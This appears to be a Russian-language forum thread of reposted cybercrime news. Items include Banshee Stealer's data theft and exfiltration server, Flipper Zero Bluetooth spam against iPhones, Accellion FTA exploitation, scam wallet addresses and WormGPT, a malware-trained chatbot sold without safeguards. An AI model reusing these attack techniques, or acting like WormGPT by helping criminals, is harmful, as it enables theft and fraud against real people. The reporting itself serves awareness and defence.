Throwaway59724 трудится ИТ-специалистом в небольшой юридической фирме. В его обязанности входит, по большому счету, конвейерная обработка цифровых доказательств для судебных процессов. Компания занимается переводом всей базы цифровых улик в облачное пространство, но только у Throwaway59724 есть доступ к облачному серверу с правами администратора и возможностью загружать в него файлы. Все остальные пользователи могут только просматривать их, без каких- либо других прав.
Сотрудники копируют сотни тысяч файлов в локальное хранилище, а Throwaway59724 нужно вручную их в облако. С его слов, это единственное, что он делал в течение всего восьмичасового рабочего дня. Он добавил, что, находившись в офисе, он большую часть времени бездельничал, и что, пока не пришла пандемия коронавируса с последующей самоизоляцией, ему приходилось притворяться, будто он всецело погружен в работу.
Из-за пандемии руководство перевело Throwaway59724 на работу из дома. Он настроил удаленный доступ к своему офисному ПК и за неделю написал простенький скрипт, который выполнял за него почти всю его работу.
Скрипт сканирует локальное хранилище на предмет наличия новых файлов и генерирует для каждого из них хэш-суммы. После этого программа копирует документы в облако и снова генерирует хэш (это нужно было в качестве доказательства, что файлы никто не редактировал).
Throwaway59724 написал, что теперь целыми днями играет в видеоигры и занимается другими делами, в том числе работает над неким собственным проектом, о котором предпочитает не распространяться. В конце дня он тратит около 10 минут на просмотр журнала работы скрипта с целью убедиться, что все прошло гладко.
Чувство вины – главный враг
Throwaway59724 признался, что в течение некоторого времени после запуска скрипта он чувствовал себя виноватым. С его слов, ему казалось, будто он обворовывает компанию, на которую работает, так как получает зарплату, ничего при это не делая.
В конце концов он сумел убедить себя, что пока руководство довольно, он все делает правильно. «Я делаю именно то, для чего меня наняли, вся работа выполняется вовремя, и я получаю удовольствие от своей жизни. Все в выигрыше», – написал Throwaway59724.
Автор поста добавил, что если работодатель решит уволить его, он просто отключит скрипт и разорвет удаленное соединение с офисным компьютером. Скрипт принадлежит ему, как и ПК у него дома, на котором он запускается.
На домашнем компьютере Throwaway59724, купленном за его счет исключительно для работы скрипта, нет никаких других файлов. Все цифровые улики находятся в локальном хранилище компании, а после работы скрипта попадают в корпоративное облако.
Сам скрипт представляет собой обычный исполняемый файл (.bat). Throwaway59724 собрал на основе информации, добытой в Google за несколько минут.
Существует вероятность, что информация все же дойдет до руководства Throwaway59724, поскольку его история получила широкое распространение в интернете и в классических СМИ, в том числе и в Newsweek, на что указал сам автор. Однако он подчеркнул, что такая слава его «не волнует».
Пользователи Reddit спросили Throwaway59724, почему он не продаст скрипт за большие деньги, раз он способен так сильно упростить работу и потенциально может освободить другим людям десятки часов их жизни. Создатель мини-программы ответил, что его творение – всего лишь поделка, притом самого базового уровня. «Пожалуйста, поймите, это не какая-то высококлассная программа, которая стоит миллионы. Это несколько строк кода, написанных в “Блокноте”. Это тип скрипта, который люди размещают на GitHub с ценником в $5», – написал Throwaway59724. Он добавил также, что созданный им скрипт пригоден для выполнения только одного вида работы и только в одной компании.
Пользователи, скачавшие поддельное приложение Ledger Live из Microsoft Store, потеряли $768 000 в различных криптовалютах. На это обратил внимание ончейн- аналитик ZachXBT.
Community Alert: There is currently a fake @Ledger Live app on the official @Microsoft App Store which was resulted in 16.8+ BTC ($588K) stolen
Scammer address
bc1qg05gw43elzqxqnll8vs8x47ukkhudwyncxy64q— ZachXBT (@zachxbt) November 5, 2023
Click to expand...
С 19 октября программа распространялась под видом легитимного пользовательского интерфейса для кошельков Ledger, позволяющего хранить криптовалюты в автономном режиме.
В общей сложности на кошелек мошенника поступило 38 транзакций на сумму 16,8 BTC ($588 000). Первая из них датирована 24 октября. Самый крупный единовременный перевод составил $81 200.
На момент написания все монеты выведены на другой адрес.
Также ZachXBT нашел Ethereum- адрес злоумышленника, на который поступили активы в эквиваленте чуть более 88 ETH. Совокупный ущерб составил $768 000.
Update: Received an ETH/BSC address from a victim that has collected ~$180K in funds from the fake app.
0x089Ecf0703B8E85183F29725f87da40AE488b7B9
This brings the total amount stolen to $768K+
— ZachXBT (@zachxbt) November 5, 2023__https://twitter.com/x/status/1721073656648921398
Click to expand...
Microsoft уже удалила поддельное приложение Ledger Live со своей платформы. Тем не менее ZachXBT полагает, что технологический гигант «должен нести ответственность» за ситуацию.
Полиция штата Вирджиния сумела задержать местного кардера благодаря случайной остановке и проверке его автомобиля. Теперь 26-летнему Осману Кану (Osman Kanu), как сообщает новостная служба телеканала ABC, грозит до 30 лет тюремного заключения.
Отмечается, что Кану с легкостью разрешил сотрудникам дорожной полиции осмотр своей машины несмотря на то, что внутри находились 15 тысяч долларов наличными, 15 дебетовых карточек Visa на разные имена и заряженный пистолет. Более того, после помещения в следственный изолятор он, будучи предупрежден о том, что исходящие звонки будут прослушиваться, связался с товарищем и попросил того вынести все подозрительные вещи из своей квартиры.
Проведенное расследование доказало, что Кану покупал идентификационные данные жителей штата Калифорния в даркнете. В частности, с помощью их номеров социального страхования он получал пособия по безработице. Часть средств ему успели выплатить — как раз на те самые 15 карточек. Суммарно Кану заработал таким образом 628 тысяч долларов, из которых 178 тысяч успел обналичить.
Кардер уже признал себя виновным в мошенничестве с использованием электронных средств, однако журналисты предполагают, что он вряд ли будет приговорен к максимально возможному сроку.
source: wric.com/news/crime/traffic-stop-in-virginia-uncovers-628000-in- california-covid-unemployment-fraud
Out of the 140 known C2 servers we are tracking at OVH that are used by APT and sophisticated crime groups, approximately 64% are still online. The affected 36% include several APTs: Charming Kitten, APT39, Bahamut and OceanLotus.
В начале сентября Telegram
[обновил](https://telegram.org/faq?setln=ru#q-there-39s-illegal-content-on-
telegram-how-do-i-take-it-down) раздел FAQ (часто задаваемых вопросов),
касающийся нелегального контента. Теперь оттуда пропала информация о том, что
все чаты в мессенджере являются конфиденциальными.
Ранее в разделе часто задаваемых вопросов в пункте «В Telegram есть незаконный контент. Как его удалить?» [присутствовала фраза](https://web.archive.org/web/20240905005129/https://telegram.org/faq#q-there-39s-illegal- content-on-telegram-how-do-i-take-it-down): «Все чаты Telegram и групповые чаты являются приватными между их участниками. Мы не обрабатываем никакие запросы, связанные с ними».
С 5 сентября в FAQ нет старой фразы про приватность и отсутствия обработки запросов. Теперь там [указано](https://telegram.org/faq?setln=ru#q-there-39s-illegal-content-on- telegram-how-do-i-take-it-down), что в Telegram есть кнопка Report, с помощью которой можно сообщить модераторам о нелегальном контенте: «Во всех приложениях Telegram есть кнопки «Пожаловаться», которые позволяют вам сообщать нашим модераторам о противозаконном контенте — всего за несколько нажатий».
Ранее основатель Telegram Павел Дуров впервые прокомментировал своё задержание во Франции, уточнил своё мнение по поводу предъявленных ему во Франции обвинений и раскрыл грядущие изменения в Telegram в рамках борьбы с запрещённым в разных странах контентом. Дуров считает, что было ошибкой обвинить только его в преступлениях, совершенных в мессенджере третьими лицами, поскольку в таких случаях надо выдвигать обвинения против компании, а не её генерального директора. Дуров заверил, что Telegram начнёт предпринимать ещё больше мер для борьбы с преступностью и запрещённым контентом.
Исследователи Elastic Security Labs обнаружили новое вредоносное ПО, нацеленное на более чем 100 расширений браузера на системах Apple macOS.
Вредоносное ПО название Banshee Stealer и реализуется в киберподполье по цене в 3000 долларов за месяц использования.
Работает как на архитектурах x86_64, так и на ARM64.
Banshee Stealer нацелен на Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Vivaldi, Yandex, Opera, OperaGX, Exodus, Electrum, Coinomi, Guarda, Wasabi Wallet, Atomic и Ledger, а также криптокошельки и около 100 расширений браузеров.
Попав в систему, вредонос вытаскивает данные из связки ключей iCloud: пароли и заметки. Дополнительно Banshee пытается препятствовать анализу и отладке: в процессе запуска проверяется наличие виртуальной среды.
Вредоносное ПО включает в себя ряд мер по борьбе с анализом и отладкой, позволяющих определить, работает ли он в виртуальной среде.
Кроме того, он задействует API CFLocaleCopyPreferredLanguages, чтобы избежать заражения систем, где русский является основным.
Как и другие виды вредоносного ПО для macOS, такие как Cuckoo и MacStealer, использует osascript для отображения поддельного запроса пароля, обманом заставляя ввести системные пароли для повышения привилегий.
Среди других примечательных функций можно отметить возможность сбора файлов с расширениями txt, docx, rtf, doc, wallet, keys и key с рабочего стола и папки с документами.
Собранные данные эксфильтруются в формате архива ZIP на удаленный сервер (45.142.122[.]92/send/).
Поскольку macOS в последнее время все чаще становится целью киберпреступников, Banshee Stealer подчеркивает растущую популярность вредоносного ПО, специфичного для яблочных устройств.
Провайдер криптокошелька Atomic Wallet сообщил, что в результате сотрудничества со специалистами по безопасности блокчейна из Chainalysis и Crystal удалось отследить и заблокировать украденные криптоактивы на сумму более $2 млн.
Речь идет о средствах, которые были украдены с криптовалютных кошельков пользователей Atomic Wallet во время хакерской атаки в июне 2023 года. Команда проекта отметила, что хакерам не удалось скрыть движение криптоактивов, несмотря на использование изощренных методов для маскировки их источника.
Atomic Wallet не раскрыл метод поиска, но отметил, что хакеры использовали миксеры криптоактивов, межсетевые экраны, перенаправление украденных активов через различные децентрализованные протоколы, а также размещение средств на депозитах централизованных бирж.
Ранее российские пользователи Atomic Wallet совместно с юридическим сервисом DestraLegal и аналитиками PlainChain заявили о подготовке коллективного иска против компании. Юристы утверждают, что Atomic Wallet не принял мер по предотвращению взлома и кражи активов.
source: bits.media/atomic-wallet-zablokiroval-2-mln-na-balanse-khakerskogo- kriptokoshelka
Разработчики решения по масштабированию Эфириума Arbitrum объявили о программе вознаграждения в размере $2 млн за обнаружение критических уязвимостей, однако выплачивают лишь $540 000.
Такую жалобу в социальной сети Twitter опубликовал «белый хакер» под псевдонимом Riptide. По его словам, он обнаружил крайне серьезную уязвимость в коде Arbitrum Nitro, которая, теоретически, могла привести к потере $470 млн. По его мнению, сообщение о такой уязвимости должно оцениваться по максимальной ставке вознаграждения в $2 млн, однако разработчики выплатили лишь 400 ETH ($540 000).
Хакер тщательно проанализировал код Arbitrum Nitro и обнаружил уязвимость в секвенсоре входящих сообщений моста при переводе активов с Эфириума на Arbitrum. Уязвимость позволила бы хакеру перенаправить средства, поступающие из сети Эфириума, на собственные кошельки.
«На мой взгляд, все просто. Если вы заявляете вознаграждение в $2 млн, то будьте готовы выплатить его при реальной заявке. Иначе просто напишите, что максимальная награда составляет 400 ETH и вопросов не будет. Хакеры следят за проектами, которые платят вознаграждения, и которые не платят. По-моему, не слишком хорошая идея мотивировать “белого хакера” становиться “черным”», – написал Riptide.
Отметим, что в июне разработчики блокчейна Aurora на базе NEAR Protocol честно выплатили «белому хакеру» награду в размере $6 млн за то, что помог предотвратить кражу 70 000 ETH.
В дежурную часть отдела полиции № 9 УМВД России по городу Омску поступило сообщение о том, что в офисе банка на улице Маршала Жукова у одной из посетительниц замечен нож.
Прибывшие сотрудники полиции доставили женщину в отдел полиции: ею оказалась 42-летняя клуша, ранее не имевшая проблем с законом.
В ходе опроса установлено, что женщина стала жертвой мошенников: неделю назад ей поступил звонок от неизвестных, которые представились работниками оператора сотовой связи. Звонившие сообщили, что омичке необходимо срочно предотвратить действия мошенников, пытающихся взломать её банковские счета и приложения. По указанию неизвестных обманутая в течение нескольких дней перечисляла денежные средства на «безопасный счёт».
Аферисты изо дня в день настойчиво продолжали телефонные звонки, представляясь работниками организаций, предоставляющих государственные услуги, а также Центрального банка России. Под надуманными предлогами мошенники убедили омичку перевести на их счета более 2 800 000 рублей.
На этом противоправные действия в отношении гражданки не прекратились: злоумышленники сообщили о якобы поступившей на её счет крупной сумме, которая включает как возврат похищенных мошенниками денег, так и компенсацию морального вреда. Также неизвестные убедили женщину взять с собой в офис банка нож.
Поверив словам аферистов, омичка направилась в финансовую организацию, стала требовать от кассира выдачи 5 миллионов рублей. Получив отказ, обманутая связалась с «сотрудником Центробанка», который указал, чтобы она достала принесенный с собой нож.
Следователем возбуждено уголовное дело по ч. 4 ст. 159 УК РФ «Мошенничество». С места происшествия кухонный нож изъят. Расследование уголовного дела продолжается. Полицейские выясняют обстоятельства произошедшего
Необычная вредоносная программа, обнаруженная недавно экспертами SophosLabs, борется с пиратством. Обосновавшись в системе жертвы, вредонос не даёт ей зайти на известные пиратские сайты.
Как известно, киберпреступники часто распространяют вредоносные программы под прикрытием фейкового пиратского софта или «кряков». Пользователь думает, что скачивает свежий фильм или популярную видеоигру, а получает зловред.
Как правило, под пиратский софт маскируют программы-вымогатели, похищающие данные трояны или вредоносные криптомайнеры. Другими словами, все те виды зловредов, которые приносят злоумышленникам максимальную прибыль.
В новом отчёте SophosLabs специалисты поделились находкой — вредоносом, препятствующим посещению знаменитого пиратского торрент-сайта The Pirate Bay.
« Это, пожалуй, наиболее странный вредонос, с которым мы сталкивались за последнее время. Основная цель этой программы — уйти от наиболее типичного поведения вредоносных программ », — пишут исследователи.
« Этот зловред не ищет и не крадёт пароли жертвы, не требует выкуп, а лишь препятствует посещению пиратских сайтов. Для этого модифицируется файл HOSTS ».
Эксперты отметили, что необычная вредоносная программа распространяется через Discord и, что удивительно, на тех же пиратских ресурсах.
Источник: https://www.anti-malware.ru/news/2021-06-18-111332/36174
"Сотрудники по противодействию киберпреступности Гродненской области установили и задержали 18-летнего минчанина, который пользовался уязвимостью электросамокатов, причиняя ущерб прокатной компании", - рассказали в МВД.
Установлено, что фигурант создал 220 аккаунтов в приложении, к которым привязал банковскую карту с нулевым балансом. "Поскольку деньги списываются по окончании поездки, он смог кататься бесплатно. Таким способом злоумышленник совершил свыше 600 поездок. Кроме того, сдавал чужое имущество в аренду знакомым или находил клиентов в интернете, получая прибыль. Со временем молодой человек настолько поверил в свою безнаказанность, что стал писать жалобы в службу поддержки с различными претензиями", - отметили в пресс- службе.
Ущерб компании превысил Br33 тыс. Следователями возбуждено уголовное дело за причинение имущественного ущерба без признаков хищения, совершенное в крупном размере.
Софт бесплатный и уже доступен на официальном сайте компании.
Компания Avast, занимающаяся программным обеспечением для обеспечения безопасности, выпустила бесплатный дешифратор для вируса-вымогателя BianLian. Дешифратор помогает жертвам вредоносных программ восстановить заблокированные файлы, не перечисляя денег злоумышленникам.
Дешифратор появился примерно через полгода после возросшей активности программы-вымогателя BianLian. Летом 2022 года она использовалась массово, были взломаны несколько известных организаций.
Инструмент Avast направлен только на BianLian. Файлы, зашифрованные другими типами шифровальщиков, он восстановить не сможет.
Также не исключено, что в сети можно наткнуться на новую версию BianLian, которую исследователи из Avast пока не видели и не оптимизировали под неё свой дешифратор.
Программа ещё находится в стадии разработки. В ближайшее время будет добавлена возможность разблокировать больше видов BianLian.
Подробнее о «BianLian»
BianLian (не путать с одноименным банковским трояном Android) — это разновидность программы-вымогателя на языке программирования Go. Вредонос нацелен на использование в системах Windows.
BianLian использует симметричный алгоритм AES-256 с режимом шифрования CBC и поддерживает более тысячи расширений файлов.
Вредоносное ПО выполняет прерывистое шифрование файлов жертвы. Это помогает ускорить процесс и не давать большой нагрузки на диск, чтобы пользователь ничего не заподозрил.
Зашифрованные файлы получают расширение «.bianlian» (с выбором дешифратора тут не ошибёшься), а сгенерированная записка о выкупе предупреждает жертв, что у них есть десять дней, чтобы выполнить требования хакера. В противном случае — личные данные жертвы будут опубликованы на сайте группировки.
Пример записки о выкупе BianLian
Что предлагает расшифровщик Avast?
Расшифровщик доступен бесплатно. Программа представляет собой автономный исполняемый файл, не требующий установки.
Пользователи могут выбрать целый каталог для расшифровки, но для этого сначала нужно предоставить программе пример: любой зашифрованный файл и его незашифрованную версию (без бэкапа придётся туго). Тогда дешифратор сможет подобрать пароль.
Дешифратор просит указать зашифрованный и оригинальный файл
В программе также есть опция для пользователей, у которых пароль расшифровки уже на руках. А получить его действительно возможно, если вовремя обнаружить атаку (об этом ниже). Если у жертвы нет пароля, программное обеспечение может попытаться подобрать его из имеющейся базы.
Дешифратор подобрал пароль
Расшифровщик также предлагает возможность резервного копирования зашифрованных файлов, чтобы предотвратить необратимую потерю данных, если что-то пойдет не так во время процесса.
В случае атаки более новых версий программы-вымогателя BianLian нужно попытаться найти двоичный файл программы-вымогателя на локальном диске, который может содержать данные для расшифровки заблокированных файлов.
Avast сообщает, что некоторые распространенные имена файлов и местоположения для них следующие:
Однако вредоносное ПО удаляет себя сразу после фазы шифрования файлов, поэтому маловероятно, что эти файлы получится найти в системе.
Сам дешифратор доступен по [этой ссылке](https://decoded.avast.io/threatresearch/decrypted-bianlian- ransomware/#bianlian_how_to_decrypt) . А в случае обнаружения в системе двоичных файлов с данными шифрования (список выше), компания просит отправить их по адресу « decryptors@avast.com ». Так Avast сможет улучшить свой дешифратор.
Житель американской Филадельфии (штат Пенсильвания) был приговорен к двум годам заключения в федеральной тюрьме судом Уилмингтона (штат Делавэр).
Как уточняет Fox 29, 39-летний Мамаду Бах (Mamadou Bah) придумал схему, которая позволила ему украсть подарочных карт и товаров на 700 тысяч долларов.
Свои преступления Бах совершил в период с мая 2018 года по июнь 2020 года. Его жертвами становились как сетевые, так и небольшие магазины с товарами для дома. Всего за это время он провел более тысячи различных транзакций, используя вымышленное имя.
Используя хакерское устройство Flipper Zero, которое стоит всего $169, злоумышленники научились атаковать iPhone нескончаемой чередой надоедливых всплывающих окон, предлагающих подключиться к AirTag, Apple TV, AirPods и другой продукции Apple. Пользоваться устройством в процессе атаки становится попросту невозможно. Единственное спасение от атаки — унести iPhone туда, где сигнал от устройства до него уже не доберётся.
Возможность такой атаки [продемонстрировал](https://techryptic.github.io/2023/09/01/Annoying-Apple- Fans/) эксперт по кибербезопасности, представившийся как Энтони (Anthony). Flipper Zero заставляет iPhone постоянно отображать всплывающие окна, из-за чего штатное использование телефона оказывается практически невозможным — по сути, это DDoS-атака или «рекламная атака по Bluetooth» , как охарактеризовал её Энтони. Для её осуществления он особым образом настроил прошивку Flipper Zero, заставив устройство транслировать по протоколу Bluetooth Low Energy сигналы на подключение Apple Watch и других устройств производителя, а также на передачу данных через Bluetooth AirDrop. Как выразился Энтони, это «вещательные сигналы, которыми пользуются устройства, чтобы объявить о своём присутствии и возможностях».
Редакция ресурса TechCrunch успешно воспроизвела атаку на iPhone 8 и iPhone 14 Pro. Для этого потребовался собственно Flipper Zero и скомпилированный код, исходники которого опубликовал автор исследования. Всплывающие на близлежащих iPhone окна с предложением подключить периферию стали появляться сразу после включения Bluetooth на хакерском устройстве. При проверке осуществимости атаки использовались скрипты для имитации находящегося поблизости трекера AirTag и для передачи номера телефона по AirDrop. Обе атаки успешно сработали, хотя воспроизвести шквал уведомлений журналистам и не удалось.
Энтони сообщил, что ему удалось разработать усовершенствованную модель такой атаки, для чего потребовалась «усиленная плата» , способная транслировать пакеты Bluetooth на большее расстояние. Но подробности этого метода он раскрывать уже не стал «из-за серьёзных опасений» злоупотреблений — он позволил бы рассылать спам-сообщения в радиусе нескольких километров. Решить проблему, уверен исследователь, смогла бы сама Apple: необходимо исключить возможность подделывать сигнал Bluetooth фирменных устройств, а также сократить расстояние, на котором такое подключение возможно.
Source: [https://3dnews.ru/1092654/hakerskoe...matakam-cherez-bluetooth-na- bligayshie-iphone](https://3dnews.ru/1092654/hakerskoe-ustroystvo-flipper- zero-obuchili-spamatakam-cherez-bluetooth-na-bligayshie-iphone)
Техническое описание + конфиги
Techryptic's Blog ](https://techryptic.github.io/2023/09/01/Annoying-Apple- Fans/)
techryptic.github.io
Подлые киберпреступники совсем забыли о понятиях чести и достоинства.
Киберпреступный форум Breached (он же BreachForums), широко известный своими тёмными и незаконными делами, сам недавно стал объектом взлома. База данных форума выставлена на продажу, а данные о его участниках переданы сервису Have I Been Pwned (HIBP).
Сервис HIBP, который оповещает пользователей о том, были ли их данные скомпрометированы в результате утечек, объявил, что посетители могут бесплатно проверить, была ли их информация раскрыта в ходе взлома форума Breached.
«В результате взлома BreachForums было раскрыто 212 тысяч записей, включая имена пользователей, IP- и электронные адреса, личные сообщения между участниками сайта и пароли, хранящиеся в виде хешей argon2», — сообщили представители HIBP.
Breached ещё совсем недавно был крупным хакерским форумом, прославившимся тем, что хранил, раскрывал и продавал данные, похищенные из взломанных компаний, правительств и организаций по всему миру.
После того, как ФБР арестовало администратора сайта Помпомпурина в марте этого года, оставшийся администратор Бафомет сначала попытался скопировать форум на новую инфраструктуру, а затем решил закрыть форум , полагая, что правоохранительные органы также имеют доступ к серверам сайта. Однако позже Бафомет запустил полный клон форума Breached (BFv2) с другим продавцом украденных данных в лице группировки Shiny Hunters.
База данных Breached сейчас распространяется злоумышленником под именем «breached_db_person», который и поделился базой данных с HIBP, чтобы доказать её подлинность потенциальным покупателям.
Бафомет, один из администраторов оригинального Breached, также подтвердил подлинность базы данных и предупредил, что её продажа является частью «продолжающейся кампании по уничтожению сообщества». «Я уверен, что мы скоро увидим базу в открытом доступе. Судя по 212 тысячам пользователей, это скорее всего старая база данных за несколько месяцев до закрытия BFv1, учитывая, что мой последний бэкап форума имеет 336 тысяч пользователей», — заявил Бафомет.
Кроме правоохранительных органов, продавец сказал, что только он, Бафомет и Помпомпурин имели доступ к этой базе данных. Злоумышленник также сообщил, что он продаст базу данных Breached только одному человеку за 100-150 тысяч долларов, и что база содержит снимок всех данных форума, сделанный 29 ноября 2022 года. Как вскоре сообщил хакер, он уже получил предложение на покупку базы за 250 000 долларов.
Как сообщается, база данных имеет размер 2 ГБ и содержит все таблицы, включая те, которые относятся к списку участников, их личным сообщениям и платёжным транзакциям.
Breached и его участники были ответственны за широкий спектр взломов, попыток вымогательства, атак с использованием вредоносного ПО и утечек украденных данных. Хотя ФБР уже объявило, что оно получило доступ к базе данных Breached после того, как оно изъяло серверы форума, эти данные все ещё могут быть ценными для специалистов по кибербезопасности и даже для других киберпреступников.
Личные сообщения между участниками могут быть бесценны для исследователей, ведь они могут раскрывать информацию о прошлых атаках, личностях и другой полезной информации. А данные о платёжных транзакциях в криптовалюте также могут быть полезны для компаний по аналитике блокчейна, которые могут использовать адреса криптовалют для связывания угроз с преступной деятельностью.
Хотя пока ещё рано говорить о том, будет ли база данных в конечном итоге продана, даже если это произойдёт, не будет удивительно, если вскоре после этого её опубликуют в бесплатный открытый доступ. Это обычная практика для утечек данных, когда они сначала покупаются в частном порядке, а затем общедоступно публикуются позже, чтобы повысить репутацию среди сообщества похитителей данных.
Изъятый правоохранителями в прошлом году форум по утечкам данных RaidForums также подвергался подобному взлому, и даже новый клон форума Breached (BFv2) уже стал жертвой утечки своей базы данных.
Из этого следует, что даже если те или иные форумы находятся в даркнете, а их администраторы полностью анонимны, вероятность того, что доступ к данным участников таких форумов получат правоохранители или третьи лица — никогда не равна нулю. Всегда есть шанс компрометации, а значит вся грязная правда рано или поздно вскроется.
Неизвестный разработчик создал свой собственный аналог ИИ-чат-бота ChatGPT, который в отличие от оригинала ориентирован на работу по ту сторону закона: чат-бот WormGPT предназначается для помощи киберпреступникам.
WormGPT появился на свет в марте, и только к июню разработчик начал продавать доступ к платформе на популярном хакерском форуме. В отличие от добропорядочных ChatGPT или Google Bard хакерский чат-бот лишён каких-либо ограничений, препятствующих ответам на вопросы о незаконной деятельности. В подтверждение этих слов разработчик привёл снимки экрана, показывающие, что можно попросить WormGPT написать вредонос на языке Python и получить у него совет по организации кибератаки. В качестве платформы при создании чат-бота использовалась относительно устаревшая большая языковая модель GPT-J с открытым исходным кодом от 2021 года. Она была обучена на материалах, связанных с разработкой вредоносного ПО, и на свет появился WormGPT.
Эксперты специализирующейся на кибербезопасности компании SlashNext ([https://slashnext.com/blog/wormgpt-...-to-launch-business-email-compromise- attacks/](https://slashnext.com/blog/wormgpt-the-generative-ai-tool- cybercriminals-are-using-to-launch-business-email-compromise-attacks/)) опробовали WormGPT, и в ответ на их запрос чат-бот составил фишинговое электронное письмо для компрометации корпоративной электронной почты — оно было убедительным и включало хитроумные стратегические ходы, направленные на успешное осуществление атаки.
Доступ к WormGPT разработчик оценил в €60 в месяц или €550 в год. Продукт, возможно, пока ещё далёк от совершенства: один из покупателей пожаловался на низкую производительность платформы. Но, так или иначе, это очевидный признак того, что генеративный искусственный интеллект может стать оружием в руках киберпреступников. И со временем подобные технологии будут совершенствоваться.
t.me
В прошлом месяце мы уже рассказывали о том, что с декабря 2020 года ИБ- эксперты фиксируют атаки на компании и организации, использующие устаревший файлообменный сервис Accellion FTA (File Transfer Application). Аналитики FireEye связали эту активность с хакерской группой FIN11 и предупреждали, что жертвами злоумышленников уже стали более 100 компаний.
По информации Accellion, среди примерно 300 клиентов FTA жертвами атак стали «менее 100», а среди них менее 25 пострадали от кражи данных. В FireEye уточняли, что некоторые из этих 25 клиентов подвергаются шантажу, и хакеры требуют у них выкуп.
Согласно последним экспертов, в рамках этой кампании хакеры эксплуатируют четыре уязвимости в FTA (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 CVE-2021-27104), а затем устанавливают веб-шелл DEWMODE и используют его для кражи файлов, хранящихся на FTA-устройствах жертв. После этого злоумышленники шантажируют пострадавших, требуя выкуп и угрожая слить похищенную информацию в открытый доступ.
Разработчики Accellion уже выпустили несколько «волн» исправлений, но каждый раз подчеркивали, что FTA уже давно является устаревшим продуктом, и призывали своих клиентов перейти на новую платформу Kiteworks. Недавно в компании и вовсе заявили, что окончательно прекратят поддержку FTA 30 апреля 2021 года.
Примечательно, что похищенные данные публикуются на сайте, который принадлежит операторам шифровальщика Clop, однако в сетях пострадавших компаний не было зашифровано ни одной машины. То есть все они стали жертвами взлома и классического вымогательства, а не атак шифровальщика.
Судя по всему, пока отказ от Accellion FTA идет медленно, к тому же две из уязвимостей (CVE-2021-27101 и CVE-2021-27104) были устранены Accellion в декабре 2020 года, но две другие проблемы (CVE-2021-27102 и CVE-2021-27103) были выявлены и исправлены лишь в январе 2021 года. В итоге новой жертвой этих злоумышленников стала Qualys, занимающаяся информационной безопасностью. Вчера на сайте Clop выложили скриншоты файлов, якобы принадлежащих Qualys. В их числе были заказы на покупку, счета-фактуры, налоговые документы и отчеты о сканированиях.
Как сообщает издание Bleeping Computer, Qualys действительно имела устройство Accellion FTA в своей сети, которое располагалось по адресу fts-na.qualys.com. Судя по данным Shodan, последний раз дейвайс был активен 18 февраля 2021 года и более не используется. Но злоумышленники все же успели скомпрометировать компанию.
Представители Qualys уже подтвердили, что их сервер Accellion FTA был взломан в декабре 2020 года, и атака затронула лишь малый процент клиентов. Также подчеркивается, что взломанный сервер был развернут в DMZ, которая отделена от внутренней сети компании, поэтому продуктовая среда компании не пострадала.
«Qualys подтверждает, что атака не оказала никакого влияния на производственные среды компании, кодовую базу или данные клиентов, размещенные на облачной платформе. Все платформы Qualys по-прежнему полностью функциональны, инцидент никак не повлиял на их работу», — гласит заявление компании.
Click to expand...
Также в Qualys сообщили, что уже отказались от использования Accellion FTA, предоставив клиентам альтернативные способы передачи файлов.
Также стоит отметить, что четыре перечисленные выше уязвимости в Accellion FTA, это далеко не все баги в этом продукте. Недавно эксперты Mandiant выявил еще два ранее неизвестных недостатка в FTA (CVE-2021-27730 и CVE-2021-27731), которые были исправлены в патче 9.12.444, выпущенном 1 марта 2021 года.
Источник: xakep.ru/2021/03/04/qualys-hacked/

](https://www.forbes.com/sites/edwardsegal/2021/12/06/8-crystal-ball- predictions-about-cyberattacks-in-2022/)
Judging by the predictions of cybersecurity experts about cyberattacks in 2022, if any of their “guesses” come true, we could be in for a rough ride next year. Fasten your seat belts.
www.forbes.com
Я очень интересуюсь дипфейками. кто-нибудь использовал ними и успел?
Компания Tether заблокировала на криптокошельках USDT более $1 млрд
Источники издания Hash Telegraph сообщают, что американская компания Tether активно пополняет черный список кошельков и блокирует пользователям доступ к стейблкоинам USDT.
После событий ноября 2017 года, когда неизвестный хакер похитил из кошелька Tether Treasury более $30 млн в стейблкоинах USDT, эмитент этих стабильных монет, компания Tether заявила о выпуске новой версии программного клиента Omni Core, способного блокировать активы и транзакции с включенных в черный список криптокошельков.
В декабре 2023 года Tether объявила об обновлении политики блокировки. С этого момента и по настоящее время компания активно блокирует доступ держателей USDT к кошелькам, внесенным в санкционный список США (SDN). За исполнением следит Служба регулирования зарубежных активов (OFAC).
«Это стратегическое решение согласуется с нашей непоколебимой приверженностью поддерживать самые высокие стандарты безопасности нашей глобальной экосистемы и способствует расширению тесных рабочих отношений с мировыми правоохранительными и регулирующими органами», — заявили в Tether.
По информации Dune Analytics, сейчас в черном списке Tether около 1 500 адресов, на которых хранится примерно 1,1 млрд USDT.
Источники Hash Telegraph считают, что блокировка USDT эмитентом нарушает основополагающие принципы децентрализации и свободы криптовалют, фактически являясь внесудебной конфискацией денежных средств. Однако с этим невозможно бороться, поскольку Tether обладает абсолютным контролем как над эмиссией, так и обращением стейблкоинов USDT. Причем полномочия закреплены в пользовательском соглашении с владельцами криптоактивов.
«Tether может по своему собственному усмотрению наложить арест на вашу собственность и передать любому правительству, правоохранительным или иным органам, когда того требуют обстоятельства», – говорится в правилах обслуживания.
В Tether заявляют, что эти полномочия необходимы для соблюдения международных стандартов противодействия отмыванию денег (AML) и финансирования терроризма (CFT).
Ранее сенаторы Конгресса США Элизабет Уоррен (Elizabeth Warren) и Роджер Маршалл (Roger Marshall) направили в администрацию Белого дома письмо с предупреждением: Россия, Иран и Северная Корея используют для обхода санкций и расчетов за поставки комплектующих двойного назначения стейблкоины USDT.
sc: dune.com/phabc/usdt---banned-addresses
Один из российских наркошопов придумал нестандартный способ привлечения сотрудников на позицию кладмена. По данным Telegram-канала «Инцидент Кузбасс», для этого используется афиша фейкового концерта Паши Техника, который якобы должен пройти в Кемерово 18 августа.
На ней указывается, что Техник презентует в городе свой новый альбом, а также исполнит все основные хиты. Для покупки билетов горожанам предлагают отсканировать QR-код, ведущий на аккаунт в Telegram с никнеймом «Покупка билетов». Другой вариант — перейти на сайт, адрес которого указан на той же афише, однако на этой страничке работает лишь одна кнопка «Купить билет», ведущая в диалог с тем же аккаунтом в популярном мессенджере.
При попытке вступить в диалог одному из пользователей ответили: «Мы не совсем билеты продаем. Интересует работа курьером? Платим 100 тысяч в неделю».
Само собой, никакого тура у Техника не планируется, концертов в Кемерово исполнитель также не анонсировал.
более подходящее "лицо компании" и не найти
